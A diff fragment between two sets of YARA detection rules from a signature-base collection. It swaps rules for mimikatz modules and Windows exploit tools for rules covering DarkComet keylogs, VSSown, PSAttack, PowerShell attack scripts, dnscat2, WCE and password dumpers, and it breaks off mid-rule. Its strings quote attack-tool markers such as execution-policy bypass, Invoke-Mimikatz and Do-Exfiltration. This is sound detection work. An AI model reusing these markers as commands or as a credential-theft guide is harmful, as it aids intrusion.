-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Kappfree : FILE
+rule SIGNATURE_BASE_Darkcomet_Keylogger_File : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file kappfree.dll"
+		description = "Looks like a keylogger file created by DarkComet Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb9c1324-5d82-57ab-bd48-98c984b45b32"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2207-L2222"
+		id = "65058450-3ae3-5b85-bcc5-8bc1fab14614"
+		date = "2014-07-25"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3049-L3063"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e57e79f190f8a24ca911e6c7e008743480c08553"
-		logic_hash = "b1b644f9b033ac8372369e81628ee3f6fe094f80d11b8f4f6c192a5e81d2e543"
-		score = 75
-		quality = 85
+		logic_hash = "28f2eb8f5082559f9de4e72243f4bf8a0be21a9a4c5e16c443d036733584ea97"
+		score = 50
+		quality = 35
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Bienvenue dans un processus distant" fullword wide
-		$s2 = "kappfree.dll" fullword ascii
-		$s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
+		$entry = /\n:: [A-Z]/
+		$timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x3A3A and #entry > 10 and #timestamp > 10
 }
-rule SIGNATURE_BASE_Smartniff : FILE
+rule SIGNATURE_BASE_Vssown_VBS
 {
 	meta:
-		description = "Chinese Hacktool Set - file Smartniff.exe"
+		description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3d169126-1b43-5545-a106-7c38a6a49499"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2224-L2239"
+		id = "ffbb5faf-3522-50dc-a568-503074ac0636"
+		date = "2015-10-01"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3065-L3082"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"
-		logic_hash = "bac770ae3c8e7f619da0b0ff4243716ff8212dce0f36c08c127af892548fe0b6"
+		logic_hash = "f49e9d7a07d591330e16fc539bd98d019b47dd8579d0f1ad92fa987790e64189"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "smsniff.exe" fullword wide
-		$s2 = "support@nirsoft.net0" fullword ascii
-		$s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii
+		$s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
+		$s1 = "Select * From Win32_ShadowCopy" ascii
+		$s2 = "cmd /C mklink /D " ascii
+		$s3 = "ClientAccessible" ascii
+		$s4 = "WScript.Shell" ascii
+		$s5 = "Win32_Process" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Chinachopper_Caidao : FILE
+rule SIGNATURE_BASE_Netview_Hacktool : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file caidao.exe"
+		description = "Network domain enumeration tool - often used by attackers - file Nv.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c56eb3e5-e916-535b-bf87-88a9ae94c359"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2241-L2259"
+		id = "087e2fd7-726e-5c6b-ba99-e20dd3337d6a"
+		date = "2016-03-07"
+		modified = "2025-04-14"
+		reference = "https://github.com/mubix/netview"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3084-L3107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"
-		logic_hash = "7e16a452c98e36a4946bcede5552bef7f6fc82314b28b506307cf010a0890ea6"
-		score = 75
+		hash = "52cec98839c3b7d9608c865cfebc904b4feae0bada058c2e8cdbd561cfa1420a"
+		logic_hash = "dc27d2358937d736823891c9d5c3f41f83a6f4e72d35fae0983435effda2141a"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Pass,Config,n{)" fullword ascii
-		$s2 = "phMYSQLZ" fullword ascii
-		$s3 = "\\DHLP\\." ascii
-		$s4 = "\\dhlp\\." ascii
-		$s5 = "SHAutoComple" fullword ascii
-		$s6 = "MainFrame" ascii
+		$s1 = "[+] %ws - Target user found - %s\\%s" fullword wide
+		$s2 = "[*] -g used without group specified - using \"Domain Admins\"" fullword ascii
+		$s3 = "[*] -i used without interval specified - ignoring" fullword ascii
+		$s4 = "[+] %ws - Session - %s from %s - Active: %d - Idle: %d" fullword wide
+		$s5 = "[+] %ws - Backup Domain Controller" fullword wide
+		$s6 = "[-] %ls - Share - Error: %ld" fullword wide
+		$s7 = "[-] %ls - Session - Error: %ld" fullword wide
+		$s8 = "[+] %s - OS Version - %d.%d" fullword ascii
+		$s9 = "Enumerating Logged-on Users" fullword ascii
+		$s10 = ": Specifies a domain to pull a list of hosts from" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1077KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Kiwitaskmgr_2 : FILE
+rule SIGNATURE_BASE_Netview_Hacktool_Output
 {
 	meta:
-		description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
+		description = "Network domain enumeration tool output - often used by attackers - file filename.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea021257-8ced-5131-a00a-be014b4112fb"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2261-L2276"
+		id = "259db870-6293-5a55-b56a-f981c060c18f"
+		date = "2016-03-07"
+		modified = "2025-04-14"
+		reference = "https://github.com/mubix/netview"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3109-L3124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
-		logic_hash = "6d197e9b7bb9bbd759d6c8c882f7d7412512ba10208cb52a08fcde5e32fd1733"
-		score = 75
+		logic_hash = "38a51e583b1485bdb29400cb9d0a73ec4d5387675779f949572d2b4d74da4230"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
-		$s2 = "Kiwi Taskmgr no-gpo" fullword wide
-		$s3 = "KiwiAndTaskMgr" fullword wide
+		$s1 = "[*] Using interval:" fullword
+		$s2 = "[*] Using jitter:" fullword
+		$s3 = "[+] Number of hosts:" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Kappfree_2 : FILE
+rule SIGNATURE_BASE_Psattack_EXE : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file kappfree.dll"
+		description = "PSAttack - Powershell attack tool - file PSAttack.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c7b4a99-b5ab-5fd6-b130-7c30b84b7171"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2278-L2294"
+		id = "87f7956a-f607-5e14-a940-5080499cf682"
+		date = "2016-03-09"
+		modified = "2023-01-06"
+		reference = "https://github.com/gdssecurity/PSAttack/releases/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3135-L3155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"
-		logic_hash = "1862f1283e8a268f523b3922b3630ebbca9a81cc5aed19e5068315e6346d25c2"
-		score = 75
-		quality = 85
+		hash = "ad05d75640c850ee7eeee26422ba4f157be10a4e2d6dc6eaa19497d64cf23715"
+		logic_hash = "b73566eb6370fbe68f0477d1179e5d6c19fb9be2c29f63d560c42adcdf19fe58"
+		score = 100
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "kappfree.dll" fullword ascii
-		$s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
-		$s3 = "' introuvable !" fullword wide
-		$s4 = "kiwi\\mimikatz" fullword wide
+		$x1 = "\\Release\\PSAttack.pdb"
+		$s1 = "set-executionpolicy bypass -Scope process -Force" fullword wide
+		$s2 = "PSAttack.Modules." ascii
+		$s3 = "PSAttack.PSAttackProcessing" fullword ascii
+		$s4 = "PSAttack.Modules.key.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and ( $x1 or 2 of ( $s* ) ) ) or 3 of them
 }
-rule SIGNATURE_BASE_X_Way2_5_Sqlcmd : FILE
+rule SIGNATURE_BASE_Powershell_Attack_Scripts
 {
 	meta:
-		description = "Chinese Hacktool Set - file sqlcmd.exe"
+		description = "Powershell Attack Scripts"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6b4dae2-38cb-5cf9-b980-df5ebefbe7ad"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2296-L2324"
+		id = "e8c4a672-229b-56c8-811b-071ae9ff341e"
+		date = "2016-03-09"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3157-L3172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"
-		logic_hash = "59fd25a786d56885e456fca154800a8313cd04a23fd9374361cc37b86be109a1"
-		score = 75
+		logic_hash = "42a52de089ee00e229499fea23b8acd0b7c881a9c578671aea180c0c018a54e0"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LOADER ERROR" fullword ascii
-		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
-		$s4 = "kernel32.dll" fullword ascii
-		$s5 = "VirtualAlloc" fullword ascii
-		$s6 = "VirtualFree" fullword ascii
-		$s7 = "VirtualProtect" fullword ascii
-		$s8 = "ExitProcess" fullword ascii
-		$s9 = "user32.dll" fullword ascii
-		$s16 = "MessageBoxA" fullword ascii
-		$s10 = "wsprintfA" fullword ascii
-		$s11 = "kernel32.dll" fullword ascii
-		$s12 = "GetProcAddress" fullword ascii
-		$s13 = "GetModuleHandleA" fullword ascii
-		$s14 = "LoadLibraryA" fullword ascii
-		$s15 = "odbc32.dll" fullword ascii
+		$s1 = "PowershellMafia\\Invoke-Shellcode.ps1" ascii
+		$s2 = "Nishang\\Do-Exfiltration.ps1" ascii
+		$s3 = "PowershellMafia\\Invoke-Mimikatz.ps1" ascii
+		$s4 = "Inveigh\\Inveigh.ps1" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Win32_Klock : FILE
+rule SIGNATURE_BASE_Psattack_ZIP : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file klock.dll"
+		description = "PSAttack - Powershell attack tool - file PSAttack.zip"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd17a8e2-54af-5967-937a-d83feceab891"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2326-L2341"
+		id = "4e064eb4-0b87-590c-9ee4-6764b982c006"
+		date = "2016-03-09"
+		modified = "2025-04-14"
+		reference = "https://github.com/gdssecurity/PSAttack/releases/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3174-L3188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7addce4434670927c4efaa560524680ba2871d17"
-		logic_hash = "e9f1d38de15ce06d55cf276e0f2becd9f9dbf5bd22f9061de03761d7ccdd3e60"
-		score = 75
+		hash = "3864f0d44f90404be0c571ceb6f95bbea6c527bbfb2ec4a2b4f7d92e982e15a2"
+		logic_hash = "4c869e8663b8c87780d4be622f86b3887511e1ac3cfc67767f1c986af7d43767"
+		score = 100
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "klock.dll" fullword ascii
-		$s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide
-		$s3 = "klock de mimikatz pour Windows" fullword wide
+		$s0 = "PSAttack.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		uint16( 0 ) == 0x4b50 and all of them
 }
-rule SIGNATURE_BASE_Ipsearcher : FILE
+rule SIGNATURE_BASE_Linux_Portscan_Shark_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ipsearcher.dll"
+		description = "Detects Linux Port Scanner Shark"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb33535a-e8cc-545d-bee8-3c31902eedb9"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2343-L2360"
+		id = "0b264106-3536-56f4-9e8c-68f3756af07d"
+		date = "2016-04-01"
+		modified = "2025-04-14"
+		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3199-L3216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"
-		logic_hash = "e63349ede826bc7b0e9c94d122e5b294c11a598fcf7096b80be726146e796a80"
+		logic_hash = "e807ed6c83c8d908bfe29c65abd7b877b65655cc64cd1497fc124a2fd88cd1e9"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "4da0e535c36c0c52eaa66a5df6e070c52e7ddba13816efc3da5691ea2ec06c18"
+		hash2 = "e395ca5f932419a4e6c598cae46f17b56eb7541929cdfb67ef347d9ec814dea3"
 
 	strings:
-		$s0 = "http://www.wzpg.com" fullword ascii
-		$s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" ascii
-		$s3 = "_GetAddress" fullword ascii
-		$s5 = "ipsearcher.dll" fullword ascii
+		$s0 = "rm -rf scan.log session.txt" fullword ascii
+		$s17 = "*** buffer overflow detected ***: %s terminated" fullword ascii
+		$s18 = "*** stack smashing detected ***: %s terminated" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
+		( uint16( 0 ) == 0x7362 and all of them )
 }
-rule SIGNATURE_BASE_Ms10048_X64 : FILE
+rule SIGNATURE_BASE_Linux_Portscan_Shark_2
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms10048-x64.exe"
+		description = "Detects Linux Port Scanner Shark"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c9bcf72-1bc7-57ed-9e0b-09d113a8c704"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2362-L2378"
+		id = "eea378d5-0399-5035-8573-139878fa1abc"
+		date = "2016-04-01"
+		modified = "2025-04-14"
+		reference = "Virustotal Research - see https://github.com/Neo23x0/Loki/issues/35"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3218-L3235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
-		logic_hash = "f6e353a9e4f751632ca5fda1663f0ba66b16b60df90570ccdaf836eaaa6a78ca"
+		logic_hash = "45efbbe01c45065efc07e9c75b6a7cdcae469861f84df4a1e1381fe864f7ddc0"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "5f80bd2db608a47e26290f3385eeb5bfc939d63ba643f06c4156704614def986"
+		hash2 = "90af44cbb1c8a637feda1889d301d82fff7a93b0c1a09534909458a64d8d8558"
 
 	strings:
-		$s1 = "The target is most likely patched." fullword ascii
-		$s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " fullword ascii
-		$s3 = "[ ] Creating evil window" fullword ascii
-		$s4 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$s1 = "usage: %s <fisier ipuri> <fisier useri:parole> <connect timeout> <fail2ban wait> <threads> <outfile> <port>" fullword ascii
+		$s2 = "Difference between server modulus and host modulus is only %d. It's illegal and may not work" fullword ascii
+		$s3 = "rm -rf scan.log" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hscangui : FILE
+rule SIGNATURE_BASE_Dnscat2_Hacktool : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscangui.exe"
+		description = "Detects dnscat2 - from files dnscat, dnscat2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f0993510-70ee-52c6-a7b8-e023eb4b33ee"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2380-L2396"
+		id = "23cca0fe-3e4e-5b91-8b53-933de8ff264a"
+		date = "2016-05-15"
+		modified = "2025-04-14"
+		reference = "https://downloads.skullsecurity.org/dnscat2/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3244-L3263"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "af8aced0a78e1181f4c307c78402481a589f8d07"
-		logic_hash = "9c0eb87dcf8aa107b5289d196650aebcf49c24f57a317de0afdadd61fb5bb5b7"
+		logic_hash = "c163a62b607323e08ca083a7091585550c830827728a8a60e25af8db6550ed1c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "8bc8d6c735937c9c040cbbdcfc15f17720a7ecef202a19a7bf43e9e1c66fe66a"
+		hash2 = "4a882f013419695c8c0ac41d8a0fde1cf48172a89e342c504138bc6f1d13c7c8"
 
 	strings:
-		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
-		$s2 = "http://www.cnhonker.com" fullword ascii
-		$s3 = "%s@ftpscan#Cracked account:  %s/%s" fullword ascii
-		$s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii
+		$s1 = "--exec -e <process>     Execute the given process and link it to the stream." fullword ascii
+		$s2 = "Sawlog" fullword ascii
+		$s3 = "COMMAND_EXEC [request] :: request_id: 0x%04x :: name: %s :: command: %s" fullword ascii
+		$s4 = "COMMAND_SHELL [request] :: request_id: 0x%04x :: name: %s" fullword ascii
+		$s5 = "[Tunnel %d] connection to %s:%d closed by the server!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
+		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 2 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Goodtoolset_Ms11080 : FILE
+rule SIGNATURE_BASE_WCE_In_Memory
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms11080.exe"
+		description = "Detects Windows Credential Editor (WCE) in memory (and also on disk)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "080e04a3-5cbe-57a8-9106-539451922cb4"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2398-L2417"
+		id = "90c90ca5-e3be-5035-b35c-c2e7faec43a5"
+		date = "2016-08-28"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3265-L3279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
-		logic_hash = "a5b03dded6146dae48bca962e7c5419c2ea69f8709ae7f2c9355bd178d5d77fb"
-		score = 75
+		logic_hash = "74ab7772db5b1de8a4eae03370e2be3cd35004730f84d472677688109a1d6d88"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[*] command add user 90sec 90sec" fullword ascii
-		$s2 = "\\ms11080\\Debug\\ms11080.pdb" ascii
-		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
-		$s4 = "[*] Add to Administrators success" fullword ascii
-		$s5 = "[*] User has been successfully added" fullword ascii
-		$s6 = "[>] ms11-08 Exploit" fullword ascii
+		$s1 = "wkKUSvflehHr::o:t:s:c:i:d:a:g:" fullword ascii
+		$s2 = "wceaux.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Epathobj_Exp64 : FILE
+rule SIGNATURE_BASE_Pstgdump : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file epathobj_exp64.exe"
+		description = "Detects a tool used by APT groups - file pstgdump.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cb56bbdc-8afa-5b4b-b7df-942dd3d60366"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2419-L2438"
+		id = "86a105a3-b5b5-58b2-99bd-ec05f31adb6b"
+		date = "2016-09-08"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3281-L3299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"
-		logic_hash = "dc4073a7d319cffbbce7b3c7b7cf02b007839b72fe14ec1fbdcd3343d57cf7bf"
+		logic_hash = "0c4f8697b1b65007acc4fdabd1c6263a428448232f95dbb12d8f737297893157"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "65d48a2f868ff5757c10ed796e03621961954c523c71eac1c5e044862893a106"
 
 	strings:
-		$s1 = "Watchdog thread %d waiting on Mutex" fullword ascii
-		$s2 = "Exploit ok run command" fullword ascii
-		$s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" ascii
-		$s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii
-		$s5 = "Mutex object did not timeout, list not patched" fullword ascii
-		$s6 = "- inconsistent onexit begin-end variables" fullword wide
+		$x1 = "\\Release\\pstgdump.pdb" ascii
+		$x2 = "Failed to dump all protected storage items - see previous messages for details" fullword ascii
+		$x3 = "ptsgdump [-h][-q][-u Username][-p Password]" fullword ascii
+		$x4 = "Attempting to impersonate domain user '%s' in domain '%s'" fullword ascii
+		$x5 = "Failed to impersonate user (ImpersonateLoggedOnUser failed): error %d" fullword ascii
+		$x6 = "Unable to obtain handle to PStoreCreateInstance in pstorec.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Kelloworld_2 : FILE
+rule SIGNATURE_BASE_Lsremora : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file kelloworld.dll"
+		description = "Detects a tool used by APT groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f298004-e618-5f4a-9cd7-c7c954b6fc64"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2440-L2455"
+		id = "c15c583f-70cd-5a80-bdea-a14582097e50"
+		date = "2016-09-08"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3301-L3323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
-		logic_hash = "a575c30c06bd84196cbf01a9b5ef3a042cf29553610421b019227d30a2c7ad1c"
+		logic_hash = "ac8f6b7284307456749b3386340a2b3deb0718bc68875bc90bccf74a96469a59"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "efa66f6391ec471ca52cd053159c8a8778f11f921da14e6daf76387f8c9afcd5"
+		hash2 = "e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e"
 
 	strings:
-		$s1 = "Hello World!" fullword wide
-		$s2 = "kelloworld.dll" fullword ascii
-		$s3 = "kelloworld de mimikatz pour Windows" fullword wide
+		$x1 = "Target: Failed to load primary SAM functions." fullword ascii
+		$x2 = "lsremora64.dll" fullword ascii
+		$x3 = "PwDumpError:999999" fullword wide
+		$x4 = "PwDumpError" fullword wide
+		$x5 = "lsremora.dll" fullword ascii
+		$s1 = ":\\\\.\\pipe\\%s" fullword ascii
+		$s2 = "x%s_history_%d:%d" fullword wide
+		$s3 = "Using pipe %s" fullword ascii
 
 	condition:
